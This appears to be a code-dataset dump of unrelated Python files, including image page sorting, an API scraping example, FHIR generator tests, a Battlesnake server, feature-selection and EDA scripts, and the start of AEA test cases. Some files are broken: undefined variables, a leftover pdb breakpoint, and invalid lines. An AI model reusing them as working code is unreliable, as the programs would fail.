fns.sort(key=os.path.getmtime)
length = len(fns)
if length % 2 == 1:
raise ValueError("Even number of files expected")
len2 = int(length / 2)
processing_params = [None] * length
# fns sorted by datetime
for i, fn in enumerate(fns):
turn = False
if i < len2:
# odd
if reverse_odd_pages:
inew = ((len2 - i) * 2) + 1
else:
inew = (i * 2) + 1
turn = turn_odd_pages
else:
# even
if reverse_even_pages:
inew = (length - i) * 2
else:
inew = (i - len2) * 2
turn = turn_even_pages
processing_params[inew - 1] = {"inew": inew, "turn": turn, "fn": fn}
# print(inew, turn, fn)
return processing_params
def sort_write_output(processing_params, output_path):
for ppars in processing_params:
inew = ppars["inew"]
turn = ppars["turn"]
fn = ppars["fn"]
_, ext = op.splitext(fn)
# = processing_params[i]
new_short_fn = '{:04d}'.format(inew) + ext
# print(new_short_fn, inew, ppars["empty"], fn[-10:])
if ppars["empty"]:
new_short_fn = "_empty_" + new_short_fn
# continue
new_fn = op.join(output_path, new_short_fn)
im = skimage.io.imread(fn)
if turn:
im = skimage.transform.rotate(im, 180)
if "angle" in ppars:
im = skimage.transform.rotate(im, ppars["angle"], cval=1)
skimage.io.imsave(new_fn, im)
| 2.75
| 3
|
teachers_notes/api_example.py
|
kchiv/data_science_basics
| 26
|
12783480
|
<filename>teachers_notes/api_example.py
# show how product information is collected from an API
# first import packages
import urllib2
import json
import pandas as pd
# this is your api information
my_api_key = "<KEY>"
# build the api url, passing in your api key
url = "http://api.shopstyle.com/api/v2/"
ties = "{}products?pid={}&cat=mens-ties&limit=100".format(url, my_api_key)
# open the connection to the api endpoint
jsonResponse = urllib2.urlopen(ties)
data = json.load(jsonResponse)
# parse the response to find out how many pages of results there are
total = data['metadata']['total']
limit = data['metadata']['limit']
offset = data['metadata']['offset']
pages = (total / limit)
print "{} total, {} per page. {} pages to process".format(total, limit, pages)
# tmp = pd.DataFrame(data['products'])
# set up an empty dictionary
dfs = {}
# connect with api again, page by page and save the results to the dictionary
for page in range(pages+1):
allTies = "{}products?pid={}&cat=mens-ties&limit=100&offset={}&sort=popular".format(url, mykeys.apiKey, (page*50))
jsonResponse = urllib2.urlopen(allTies)
data = json.load(jsonResponse)
dfs[page] = pd.DataFrame(data['products'])
# convert the dictionary to a pandas data frame object
df = pd.concat(dfs, ignore_index=True)
# Cleaning records, removing duplicates
df = df.drop_duplicates('id')
df['priceLabel'] = df['priceLabel'].str.replace('$', '')
df['priceLabel'] = df['priceLabel'].astype(float)
# continue cleaning up the data, split data into columns as necesary
def breakId(x, y = 0):
try:
y = x["id"]
except:
pass
return y
def breakName(x, y=""):
try:
y = x["name"]
except:
pass
return y
df['brandId'] = df['brand'].map(breakId);
df['brandName'] = df['brand'].map(breakName);
def breakCanC(x,y=""):
try:
y = x[0]["canonicalColors"][0]["name"]
except:
pass
return y
def breakColorName(x, y=""):
try:
y = x[0]["name"]
except:
pass
return y
def breakColorId(x, y=""):
try:
y = x[0]["canonicalColors"][0]["id"]
except:
pass
return y
df['colorId'] = df['colors'].map(breakColorId);
df['colorFamily'] = df['colors'].map(breakCanC);
df['colorNamed'] = df['colors'].map(breakColorName);
# export to data.csv
df.to_csv("data.csv", sep='\t', encoding='utf-8',
columns=['id', 'priceLabel', 'name','brandId', 'brandName', 'colorId', 'colorFamily', 'colorNamed'])
| 3.703125
| 4
|
tests/test_generate.py
|
anthem-ai/fhir-types
| 2
|
12783481
|
from pathlib import Path
from tempfile import TemporaryDirectory
from typing import Any, Dict, List, Tuple
import pytest
from scripts.generate import (
CIRCULAR_PROPERTY_REFERENCES,
CIRCULAR_REFERENCES,
INT_PROPERTIES,
ObjectDefinition,
OneOfDefinition,
PrimitiveDefinition,
Property,
Schema,
generate_files,
get_definition_class,
get_import_line_from_reference,
get_init_py,
get_resource_file_name,
get_resource_from_path,
get_resource_var_name,
get_schema,
)
def test_utils() -> None:
assert get_resource_from_path("#/definitions/Account") == "Account"
assert get_resource_var_name("Account") == "FHIR_Account"
assert get_resource_file_name("Account") == "FHIR_Account"
import_line = "from .FHIR_Account import FHIR_Account\n"
assert get_import_line_from_reference("Account") == import_line
assert Property.get_enum_literal(["a", "b"]) == 'Literal["a", "b"]'
def test_get_definition() -> None:
assert type(OneOfDefinition) == type(
get_definition_class("Property", {"oneOf": []})
)
assert type(PrimitiveDefinition) == type(
get_definition_class("boolean", {"properties": {}})
)
assert type(ObjectDefinition) == type(
get_definition_class("Property", {"properties": {}})
)
with pytest.raises(Exception, match="Not expecting this schema definition"):
get_definition_class("Property", {"oneOfQQQ": []})
def test_primitive_def() -> None:
def build(line: str) -> str:
return f"# aaa\n{line}"
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "string"}
).generate() == build("FHIR_a = str")
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "boolean"}
).generate() == build("FHIR_a = bool")
assert PrimitiveDefinition(
"a", {"description": "aaa", "type": "number"}
).generate() == build("FHIR_a = float")
# No Type Provided (XHTML works this way)
assert PrimitiveDefinition("a", {"description": "aaa"}).generate() == build(
"FHIR_a = str"
)
# Check override INT
prop_name = INT_PROPERTIES[0]
assert PrimitiveDefinition(
prop_name, {"description": "aaa", "type": "number"}
).generate() == build(f"FHIR_{prop_name} = int")
# Check bad type given
with pytest.raises(Exception, match="Not able to handle schema"):
PrimitiveDefinition("a", {"description": "aaa", "type": "number123"}).generate()
def test_oneof_def() -> None:
schema = {
"oneOf": [{"$ref": "#/definitions/Account"}, {"$ref": "#/definitions/Patient"}]
}
lines = [
"from typing import Union",
"from .FHIR_Account import FHIR_Account",
"from .FHIR_Patient import FHIR_Patient",
"FHIR_Result = Union[",
" FHIR_Account,",
" FHIR_Patient,",
"]",
]
definition = OneOfDefinition("Result", schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_object_def() -> None:
schema = {
"description": "aaa",
"properties": {
"a": {"description": "bbb", "type": "string"},
"b": {"description": "bbb", "$ref": "#/definitions/Account"},
},
}
lines = [
"from typing import Any, List, TypedDict, Literal",
"from .FHIR_Account import FHIR_Account",
"# aaa",
'FHIR_Result = TypedDict("FHIR_Result", {',
" # bbb",
' "a": str,',
" # bbb",
' "b": FHIR_Account,',
"}, total=False)",
]
definition = ObjectDefinition("Result", schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_object_def_circular() -> None:
circular_reference = list(CIRCULAR_REFERENCES)[0]
circular_parent = list(CIRCULAR_PROPERTY_REFERENCES.keys())[0]
circular_property = CIRCULAR_PROPERTY_REFERENCES[circular_parent][0]
schema = {
"description": "aaa",
"properties": {
# property can't point to self
"a": {"description": "bbb", "$ref": f"#/definitions/{circular_parent}"},
# circular references are blacklisted
"b": {"description": "bbb", "$ref": f"#/definitions/{circular_reference}"},
# reference.properties are blacklisted
circular_property: {"description": "bbb", "$ref": "#/definitions/123"},
},
}
# There should be no import references in any of these cases
lines = [
"from typing import Any, List, TypedDict, Literal",
"# aaa",
f"FHIR_{circular_parent} = TypedDict(\"FHIR_{circular_parent}\", {'{'}",
" # bbb",
' "a": Any,',
" # bbb",
' "b": Any,',
" # bbb",
f' "{circular_property}": Any,',
"}, total=False)",
]
definition = ObjectDefinition(circular_parent, schema)
result = definition.generate().split("\n")
for i in range(len(result)):
assert result[i] == lines[i]
def test_property_gen() -> None:
parent = "Parent"
circular_reference = list(CIRCULAR_REFERENCES)[0]
mappings: List[Tuple[str, Dict[str, Any]]] = [
("bool", {"description": "aaa", "type": "boolean"}),
("str", {"description": "aaa", "type": "string"}),
("float", {"description": "aaa", "type": "number"}),
('Literal["Account"]', {"description": "aaa", "const": "Account"}),
('Literal["a", "b"]', {"description": "aaa", "enum": ["a", "b"]}),
("FHIR_Account", {"description": "aaa", "$ref": "#/definitions/Account"}),
(
'List[Literal["a", "b"]]',
{
"description": "aaa",
"type": "array",
"items": {"enum": ["a", "b"]},
},
),
(
"List[FHIR_Account]",
{
"description": "aaa",
"type": "array",
"items": {"$ref": "#/definitions/Account"},
},
),
# Circular Reference
("Any", {"description": "aaa", "$ref": f"#/definitions/{circular_reference}"}),
# Self reference
("Any", {"description": "aaa", "$ref": f"#/definitions/{parent}"}),
]
for result, schema in mappings:
p = Property("prop_a", schema, parent)
assert p.generate_property() == result
# Check Circular Property as well
circular_parent = list(CIRCULAR_PROPERTY_REFERENCES.keys())[0]
circular_property = CIRCULAR_PROPERTY_REFERENCES[circular_parent][0]
p2 = Property(
circular_property,
{"description": "aaa", "$ref": "#/definitions/123"},
circular_parent,
)
assert p2.generate_property() == "Any"
def test_property_gen_fail() -> None:
with pytest.raises(Exception, match="Property schema can not be handled"):
schema: Schema = {"description": "aaa", "type": "123"}
p = Property("prop_a", schema, "parent")
p.generate()
with pytest.raises(Exception, match=r"items should have \$ref or enum"):
schema = {"description": "aaa", "type": "array", "items": {"type": "string"}}
p = Property("prop_a", schema, "parent")
p.generate()
def test_get_init_py() -> None:
expected = """from .FHIR_foo import FHIR_foo
from .FHIR_bar import FHIR_bar
__all__ = ['FHIR_foo', 'FHIR_bar']
"""
assert get_init_py(["foo", "bar"]) == expected
def test_generate_files_and_get_schema() -> None:
with TemporaryDirectory() as _tempdir:
tempdir = Path(_tempdir)
generate_files(get_schema(), tempdir)
assert tempdir.joinpath("__init__.py").exists()
assert tempdir.joinpath("FHIR_Account.py").exists()
assert tempdir.joinpath("FHIR_Patient.py").exists()
| 2.375
| 2
|
app/main.py
|
dogacuboh/doga-cuboh-snake
| 0
|
12783482
|
import json
import os
import bottle
import time
from app.api import ping_response, start_response, move_response, end_response
from app.board import update_board
from app.random_snake import random_move
from app.food_snake import food_move
from app.wall_snake import wall_move
from app.smart_snake import smart_move
from app.doga_snake import doga_move
snake_num = 0
@bottle.route('/')
def index():
return bottle.static_file('index.html', root='./static/')
@bottle.route('/static/<path:path>')
def static(path):
return bottle.static_file(path, root='./static/')
@bottle.post('/ping')
def ping():
return ping_response()
@bottle.post('/start')
def start():
game_state = bottle.request.json
snake_colour = "#ff0000"
return start_response(snake_colour)
@bottle.post('/move')
def move():
game_state = bottle.request.json
new_board = update_board(game_state)
direction = ""
direction = doga_move(game_state, new_board)
return move_response(direction)
@bottle.post('/end')
def end():
game_state = bottle.request.json
return end_response()
# Expose WSGI app (so gunicorn can find it)
application = bottle.default_app()
def is_input(temp):
if not temp.isnumeric():
return False
if not len(temp)==1:
return False
if int(temp)<1 or int(temp)>5:
return False
return True
if __name__ == '__main__':
snake_num = 5
bottle.run(
application,
host=os.getenv('IP', '0.0.0.0'),
port=os.getenv('PORT', '8080'),
debug=os.getenv('DEBUG', True)
)
| 2.203125
| 2
|
helpers/utils.py
|
mirceamironenco/GANs
| 8
|
12783483
|
<filename>helpers/utils.py
def print_flags(flags):
for key, value in vars(flags).items():
print("{}: {}".format(key, str(value)))
def load_mnist():
from tensorflow.examples.tutorials.mnist import input_data
return input_data.read_data_sets("./MNIST_data", one_hot=True)
| 2.53125
| 3
|
src/features/feature_selection.py
|
gaybro8777/data_science_for_health_unicamp
| 1
|
12783484
|
import os
import pandas as pd
import pdb
import seaborn as sns
import matplotlib.pyplot as plt
#import pymrmr
from scipy.stats import kendalltau, pearsonr, spearmanr
from sklearn.feature_selection import SelectKBest, mutual_info_classif, chi2, f_classif, RFE
import numpy as np
# Feature Importance Sklearn
# https://machinelearningmastery.com/calculate-feature-importance-with-python/
class Feature_Selection(object):
"""
Class with preprocessments to apply in dataframe
"""
def __init__(self):
super().__init__()
self.correlation_matrix = Correlation_Matrix()
def select_features(self,df,columns):
raise NotImplementedError()
def get_missing_values_df(self,df):
percent_missing = df.isnull().sum() * 100 / len(df)
missing_value_df = pd.DataFrame({'column_name': df.columns,'percent_missing': percent_missing})
return missing_value_df
def get_correlation_matrix(self,df,method):
return self.correlation_matrix.get_correlation_matrix(df,method)
def plot_correlation_matrix(self,df_corr,plot=True):
return self.correlation_matrix.plot_correlation_matrix(df_corr,plot)
def get_correlation_with_target(self,df,target_column,method,num_feats=10):
return self.correlation_matrix.get_correlation_with_target(df,target_column,method,num_feats)
def get_IG_feature_scores(self,df,n_features_to_select):
"""
IG calculates the importance of each feature by measuring the increase in entropy when the feature is given vs. absent.
"""
bestfeatures = SelectKBest(score_func=mutual_info_classif, k=n_features_to_select) # n is number of features you want to select
fit = bestfeatures.fit(xs,y)
dfscores = pd.DataFrame(fit.scores_)
dfcolumns = pd.DataFrame(xs.columns)
featureScores = pd.concat([dfcolumns,dfscores],axis=1)
featureScores.columns = ['Feature','Score']
return featureScores
# def get_mRMR_feature_scores(self,df,n_features_to_select):
# # https://medium.com/subex-ai-labs/feature-selection-techniques-for-machine-learning-in-python-455dadcd3869
# """
# (Minimal Redundancy and Maximal Relevance)
# Intuition: It selects the features, based on their relevancy with the target variable, as well as their redundancy with the other features.
# """
# selected_features = pymrmr.mRMR(df, 'MIQ',n_features_to_select)
# return selected_features
def get_chisquare_feature_scores(self,df,target_column,n_features_to_select):
"""
It calculates the correlation between the feature and target and selects the best k features according to their chi square score calculated using following chi square test.
"""
X,y = self._split_df_in_xy(df,target_column)
import pdb;pdb.set_trace()
bestfeatures = SelectKBest(score_func=chi2, k=n_features_to_select) # n is number of features you want to select
fit = bestfeatures.fit(X,y)
dfscores = pd.DataFrame(fit.scores_)
dfcolumns = pd.DataFrame(xs.columns)
featureScores = pd.concat([dfcolumns,dfscores],axis=1)
featureScores.columns = ['Feature','Score']
return featureScores
def get_anova_feature_scores(self,df,n_features_to_select):
"""
We perform Anova between features and target to check if they belong to same population.
"""
bestfeatures = SelectKBest(score_func=f_classif, k=n_features_to_select) # n is number of features you want to select
fit = bestfeatures.fit(xs,y)
dfscores = pd.DataFrame(fit.scores_)
dfcolumns = pd.DataFrame(xs.columns)
featureScores = pd.concat([dfcolumns,dfscores],axis=1)
featureScores.columns = ['Feature','Score']
return featureScores
def get_features_by_RFE(self,df,model):
"""
It is a greedy optimization algorithm which aims to find the best performing feature subset. It repeatedly creates models and keeps aside the best or the worst performing feature at each iteration. It constructs the next model with the left features until all the features are exhausted. It then ranks the features based on the order of their elimination.
"""
#model = LogisticRegression(max_iter=1000)
rfe_model = RFE(model, 20)
rfe_fit = rfe_model.fit(x, y)
selected = df[df.columns[rfe_fit.get_support(indices=True)]]
return selected
def get_feature_selection_summary(self,df):
# https://towardsdatascience.com/the-5-feature-selection-algorithms-every-data-scientist-need-to-know-3a6b566efd2
# put all selection together
feature_selection_df = pd.DataFrame({'Feature':feature_name, 'Pearson':cor_support, 'Chi-2':chi_support, 'RFE':rfe_support, 'Logistics':embeded_lr_support,
'Random Forest':embeded_rf_support, 'LightGBM':embeded_lgb_support})
# count the selected times for each feature
feature_selection_df['Total'] = np.sum(feature_selection_df, axis=1)
# display the top 100
feature_selection_df = feature_selection_df.sort_values(['Total','Feature'] , ascending=False)
feature_selection_df.index = range(1, len(feature_selection_df)+1)
feature_selection_df.head(num_feats)
class Correlation_Matrix(object):
def __init__(self):
super().__init__()
def get_correlation_with_target(self,df,target_column,method,num_feats):
corr_dict = self.get_correlation_matrix(df,method)
df_k,df_p = corr_dict['df_k'],corr_dict['df_p']
correlations_with_target = df_k[target_column]
correlations_with_target = correlations_with_target.fillna(0)
correlations_with_target = correlations_with_target[correlations_with_target.index.difference([target_column])]
correlations_with_target = correlations_with_target.map(lambda x : x).abs().sort_values(ascending = False)
correlations_with_target = correlations_with_target[:num_feats]
return correlations_with_target
def plot_correlation_matrix(self,df_corr,plot=True):
plt.figure(figsize=(16, 6))
heatmap = sns.heatmap(df_corr, vmin=-1, vmax=1, annot=True, cmap='coolwarm')
heatmap.set_title('Correlation Heatmap', fontdict={'fontsize':18}, pad=12)
if plot:
plt.show()
else:
return heatmap
def get_correlation_matrix(self,df,method):
accpedted_correlations = ['pearson','spearman','kendall']
if method not in accpedted_correlations:
raise ValueError(f"O método deve ser um entre {accpedted_correlations}")
if method == 'pearson':
method_k = self._pearsonr_rval
method_p = self._pearsonr_pval
elif method == 'spearman':
method_k = self._spearmanr_rval
method_p = self._spearmanr_pval
elif method == 'kendall':
method_k = self._kendall_rval
method_p = self._kendall_pval
df_k = df.corr(method=method_k)
df_p = df.corr(method=method_p)
return {'df_k':df_k,'df_p':df_p}
def _kendall_rval(self,x,y):
return np.round(kendalltau(x,y)[0],6)
def _pearsonr_rval(self,x,y):
return np.round(pearsonr(x,y)[0],6)
def _spearmanr_rval(self,x,y):
return np.round(spearmanr(x,y)[0],6)
def _kendall_pval(self,x,y):
return np.round(kendalltau(x,y)[1],6)
def _pearsonr_pval(self,x,y):
return np.round(pearsonr(x,y)[1],6)
def _spearmanr_pval(self,x,y):
return np.round(spearmanr(x,y)[1],6)
| 3.390625
| 3
|
setup.py
|
rom1mouret/orthogonal_learning
| 5
|
12783485
|
<filename>setup.py
#!/usr/bin/env python
from distutils.core import setup
setup(name='orthocl',
version='0.1',
description='Orthogonal Continual Learning',
author='<NAME>',
url='https://github.com/rom1mouret/orthogonal_learning',
packages=['orthocl'],
)
| 1.171875
| 1
|
Code/EDA.py
|
mdevineni89/Final-Project-Group3
| 0
|
12783486
|
#########
11/15/2021
#Generating a dataset for only categorical
df_categorical = df.select_dtypes(exclude=['number'])
df_categorical=df_categorical.drop(['Date.of.Birth','DisbursalDate'],axis=1)
df_categorical.head()
#Building a Dataset for numerical (continous)
df_continuous = df.select_dtypes(include=['number'])
df_continuous=df_continuous.drop(['UniqueID'],axis=1)
df_continuous.head()
#Univariate Analysis
import matplotlib.pyplot as plt # Charge matplotlib
import seaborn as sns # Charge seaborn
#To obtain the basic statistics
df_continuous.describe()
#Get the List of all Column Names
continuous_list = list(df_continuous)
# Plot for all continous
#1
sns.displot(df['disbursed_amount'][df['disbursed_amount'] < df['disbursed_amount'].quantile(.99)],kind='hist',kde=True)
plt.show()
#2
sns.displot(df['asset_cost'][df['asset_cost'] < df['asset_cost'].quantile(.99)],kind='hist',kde=True)
plt.show()
#3
sns.displot(df['ltv'][df['ltv'] < df['ltv'].quantile(.99)],kind='hist',kde=True)
plt.show()
#4
sns.displot(df['PERFORM_CNS.SCORE'][df['PERFORM_CNS.SCORE'] < df['PERFORM_CNS.SCORE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#5
sns.displot(df['PRI.NO.OF.ACCTS'][df['PRI.NO.OF.ACCTS'] < df['PRI.NO.OF.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#6
sns.displot(df['PRI.ACTIVE.ACCTS'][df['PRI.ACTIVE.ACCTS'] < df['PRI.ACTIVE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#6
sns.displot(df['PRI.OVERDUE.ACCTS'][df['PRI.OVERDUE.ACCTS'] < df['PRI.OVERDUE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#7
sns.displot(df['PRI.CURRENT.BALANCE'][df['PRI.CURRENT.BALANCE'] < df['PRI.CURRENT.BALANCE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#8
sns.displot(df['PRI.SANCTIONED.AMOUNT'][df['PRI.SANCTIONED.AMOUNT'] < df['PRI.SANCTIONED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#9
sns.displot(df['PRI.DISBURSED.AMOUNT'][df['PRI.DISBURSED.AMOUNT'] < df['PRI.DISBURSED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#10
sns.displot(df['SEC.NO.OF.ACCTS'][df['SEC.NO.OF.ACCTS'] < df['SEC.NO.OF.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#11
sns.displot(df['SEC.ACTIVE.ACCTS'][df['SEC.ACTIVE.ACCTS'] < df['SEC.ACTIVE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#12
sns.displot(df['SEC.OVERDUE.ACCTS'][df['SEC.OVERDUE.ACCTS'] < df['SEC.OVERDUE.ACCTS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#13
sns.displot(df['SEC.CURRENT.BALANCE'][df['SEC.CURRENT.BALANCE'] < df['SEC.CURRENT.BALANCE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#14
sns.displot(df['SEC.SANCTIONED.AMOUNT'][df['SEC.SANCTIONED.AMOUNT'] < df['SEC.SANCTIONED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#15
sns.displot(df['SEC.DISBURSED.AMOUNT'][df['SEC.DISBURSED.AMOUNT'] < df['SEC.DISBURSED.AMOUNT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#16
sns.displot(df['PRIMARY.INSTAL.AMT'][df['PRIMARY.INSTAL.AMT'] < df['PRIMARY.INSTAL.AMT'].quantile(.99)],kind='hist',kde=True)
plt.show()
#17
sns.displot(df['NEW.ACCTS.IN.LAST.SIX.MONTHS'][df['NEW.ACCTS.IN.LAST.SIX.MONTHS'] < df['NEW.ACCTS.IN.LAST.SIX.MONTHS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#18
sns.displot(df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'][df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'] < df['DELINQUENT.ACCTS.IN.LAST.SIX.MONTHS'].quantile(.99)],kind='hist',kde=True)
plt.show()
#19
sns.displot(df['AVERAGE.ACCT.AGE'][df['AVERAGE.ACCT.AGE'] < df['AVERAGE.ACCT.AGE'].quantile(.99)],kind='hist',kde=True)
plt.show()
#20
sns.displot(df['CREDIT.HISTORY.LENGTH'][df['CREDIT.HISTORY.LENGTH'] < df['CREDIT.HISTORY.LENGTH'].quantile(.99)],kind='hist',kde=True)
plt.show()
#21
sns.displot(df['CREDIT.HISTORY.LENGTH'][df['CREDIT.HISTORY.LENGTH'] < df['CREDIT.HISTORY.LENGTH'].quantile(.99)],kind='hist',kde=True)
plt.show()
#22
sns.displot(df['NO.OF_INQUIRIES'][df['NO.OF_INQUIRIES'] < df['NO.OF_INQUIRIES'].quantile(.99)],kind='hist',kde=True)
plt.show()
#23
sns.displot(df['Age'][df['Age'] < df['Age'].quantile(.99)],kind='hist',kde=True)
plt.show()
#23
sns.displot(df['Disbursal_months'][df['Disbursal_months'] < df['Disbursal_months'].quantile(.99)],kind='hist',kde=True)
plt.show()
########Multivariate Analysis
plt.rcParams["figure.figsize"] = (10,7)
sns.heatmap(df_continuous.corr())
plt.show()
#Heat map
sns.heatmap(df_continuous.corr(), cmap="YlGnBu", annot=False,mask=np.triu(df_continuous.corr()))
plt.show()
#Heat map that highligts if the correlation is greater than 0.6
sns.heatmap(df_continuous.corr().abs()>0.6, cmap="YlGnBu", annot=False,mask=np.triu(df_continuous.corr()))
plt.show() # black are with the highest correlation
def get_redundant_pairs(df):
'''Get diagonal and lower triangular pairs of correlation matrix'''
pairs_to_drop = set()
cols = df.columns
for i in range(0, df.shape[1]):
for j in range(0, i+1):
pairs_to_drop.add((cols[i], cols[j]))
return pairs_to_drop
def get_top_abs_correlations(df, n=5):
au_corr = df.corr().abs().unstack()
labels_to_drop = get_redundant_pairs(df)
au_corr = au_corr.drop(labels=labels_to_drop).sort_values(ascending=False)
return au_corr[0:n]
list1=get_top_abs_correlations(df_continuous,n=9)
print(list1)
'''
11/22 Aihan added, file name unchanged
test needed
'''
# Continuous variable vs categorical variables
score_ranking = ["A-Very Low Risk", "B-Very Low Risk", "C-Very Low Risk", "D-Very Low Risk", \
"E-Low Risk", "F-Low Risk", "G-Low Risk", "H-Medium Risk", "I-Medium Risk", "J-High Risk", "K-High Risk",\
"L-Very High Risk", "M-Very High Risk", "No Bureau History Available", "Not Scored: No Activity seen on the customer (Inactive)", \
"Not Scored: Not Enough Info available on the customer", "Not Scored: Sufficient History Not Available", "Not Scored: Only a Guarantor",\
"Not Scored: No Updates available in last 36 months1", "Not Scored: More than 50 active Accounts found"]
# sns.boxplot(x="PERFORM_CNS.SCORE.DESCRIPTION", y="PERFORM_CNS.SCORE", color="b", data=df_subset)
# plt.show()
def df_boxplot(df, xstr, ystr):
sns.boxplot(x=xstr, y=ystr, palette=sns.color_palette(), data=df)
plt.show()
# continuous variable vs target
df_subset = merge_df[merge_df['PERFORM_CNS.SCORE.DESCRIPTION'] < 13]
df_boxplot(df_subset, "PERFORM_CNS.SCORE.DESCRIPTION", "PERFORM_CNS.SCORE")
#continuous variable vs target
df_boxplot(merge_df, "loan_default", y="PERFORM_CNS.SCORE")
# t-test
# stats.ttest_ind(a, b, equal_var = False)
| 3.25
| 3
|
tests/test_test_tools/test_test_cases.py
|
marcofavorito/agents-aea
| 0
|
12783487
|
<gh_stars>0
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This module contains a test for aea.test_tools.test_cases."""
import os
import time
from pathlib import Path
import pytest
import aea
from aea.configurations.base import AgentConfig
from aea.mail.base import Envelope
from aea.protocols.base import Message
from aea.protocols.dialogue.base import Dialogue
from aea.test_tools.exceptions import AEATestingException
from aea.test_tools.test_cases import AEATestCase, AEATestCaseEmpty
from packages.fetchai.protocols.default.dialogues import (
DefaultDialogue,
DefaultDialogues,
)
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.skills.echo import PUBLIC_ID as ECHO_SKILL_PUBLIC_ID
from tests.conftest import FETCHAI, MY_FIRST_AEA_PUBLIC_ID
from tests.test_cli import test_generate_wealth, test_interact
TestWealthCommandsPositive = test_generate_wealth.TestWealthCommandsPositive
TestInteractCommand = test_interact.TestInteractCommand
class TestConfigCases(AEATestCaseEmpty):
"""Test config set/get."""
def test_agent_nested_set_agent_crudcollection(self):
"""Test agent test nested set from path."""
key_name = "agent.private_key_paths.cosmos"
self.nested_set_config(key_name, "testdata2000")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"testdata2000" in result.stdout_bytes
def test_agent_nested_set_agent_crudcollection_all(self):
"""Test agent test nested set from path."""
key_name = "agent.private_key_paths"
self.nested_set_config(key_name, {"cosmos": "testdata2000"})
result = self.run_cli_command(
"config", "get", f"{key_name}.cosmos", cwd=self._get_cwd()
)
assert b"testdata2000" in result.stdout_bytes
def test_agent_nested_set_agent_simple(self):
"""Test agent test nested set from path."""
key_name = "agent.registry_path"
self.nested_set_config(key_name, "some_path")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_path" in result.stdout_bytes
def test_agent_nested_set_skill_simple(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args.some_key"
self.nested_set_config(key_name, "some_value")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_skill_simple_nested(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args.some_key"
self.nested_set_config(f"{key_name}.some_nested_key", "some_value")
def test_agent_nested_set_skill_all(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args"
self.nested_set_config(key_name, {"some_key": "some_value"})
result = self.run_cli_command(
"config", "get", f"{key_name}.some_key", cwd=self._get_cwd()
)
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_skill_all_nested(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.skills.error.handlers.error_handler.args"
self.nested_set_config(
key_name, {"some_key": {"some_nested_key": "some_value"}}
)
def test_agent_nested_set_connection_simple(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.connections.stub.config.input_file"
self.nested_set_config(key_name, "some_value")
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert b"some_value" in result.stdout_bytes
def test_agent_nested_set_connection_dependency(self):
"""Test agent test nested set from path."""
key_name = "vendor.fetchai.connections.stub.dependencies"
self.nested_set_config(key_name, {"dep": {"version": "==1.0.0"}})
def test_agent_set(self):
"""Test agent test set from path."""
value = True
key_name = "agent.logging_config.disable_existing_loggers"
self.set_config(key_name, value)
result = self.run_cli_command("config", "get", key_name, cwd=self._get_cwd())
assert str(value) in str(result.stdout_bytes)
def test_agent_get_exception(self):
"""Test agent test get non exists key."""
with pytest.raises(Exception, match=".*bad_key.*"):
self.run_cli_command("config", "get", "agent.bad_key", cwd=self._get_cwd())
class TestRunAgent(AEATestCaseEmpty):
"""Tests test for generic cases of AEATestCases."""
def test_run_agent(self):
"""Run agent and test it's launched."""
process = self.run_agent()
assert self.is_running(process, timeout=30)
class TestGenericCases(AEATestCaseEmpty):
"""Tests test for generic cases of AEATestCases."""
def test_disable_aea_logging(self):
"""Call logging disable."""
self.disable_aea_logging()
def test_start_subprocess(self):
"""Start a python subprocess and check output."""
proc = self.start_subprocess("-c", "print('hi')")
proc.wait(10)
assert "hi" in self.stdout[proc.pid]
def test_start_thread(self):
"""Start and join thread for python code."""
called = False
def fn():
nonlocal called
called = True
thread = self.start_thread(fn)
thread.join(10)
assert called
def test_fetch_and_delete(self):
"""Fetch and delete agent from repo."""
agent_name = "some_agent_for_tests"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
assert os.path.exists(agent_name)
self.delete_agents(agent_name)
assert not os.path.exists(agent_name)
def test_diff(self):
"""Test difference_to_fetched_agent."""
agent_name = "some_agent_for_tests2"
self.fetch_agent(str(MY_FIRST_AEA_PUBLIC_ID), agent_name)
self.run_cli_command(
